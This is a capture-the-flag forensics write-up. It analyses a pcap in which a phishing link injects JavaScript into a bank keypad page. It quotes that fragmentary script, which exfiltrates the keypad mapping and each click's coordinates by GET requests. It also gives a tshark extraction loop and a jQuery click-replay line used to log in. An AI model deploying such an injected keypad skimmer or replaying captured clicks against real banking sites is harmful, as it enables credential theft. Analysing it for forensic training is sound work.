The police have arrested a cyber criminal but they don’t have a good witness. Just a short capture of his network traffic is available . Is it helpful?

A pcap network traffic log is attached. By opening it in wireshark you could see that an email is sent with a link to this page that injects the following javascript code into the page.

function sendmap(){
  var buttons=document.getElementsByClassName("keypadButtonStyle");
  var keymap="";
  for(var i=0;i<buttons.length;i++)
  var xmlhttp=new XMLHttpRequest();"GET",""+keymap,false);
function clickdone(e){
  var xPosition=e.clientX;
  var yPosition=e.clientY;
  var xmlhttp=new XMLHttpRequest();"GET",""+xPosition+","+yPosition,false);

It first sends the mapping of keys to

then on each click sends the x and y position of click to that page.

We used the following shell script to find all GET requests to the given address.


touch bank-followstream.txt
END=$(tshark -r $1 -T fields -e | sort -n | tail -1)
for ((i=0;i<=END;i++)) do
     echo $i
     tshark -r $1 -qz follow,tcp,ascii,$i >> bank-followstream.txt

grep "GET /c.php" < bank-followstream.txt

Key mapping is 4 1 6 3 7 0 8 9 5 2 Backspace. With a simple javascript code you can simulate clicks on the original page. After logging in the flag will appear.
This line of javascript (using jQuery) code may be helpful!:

$(document.elementFromPoint(x, y)).click();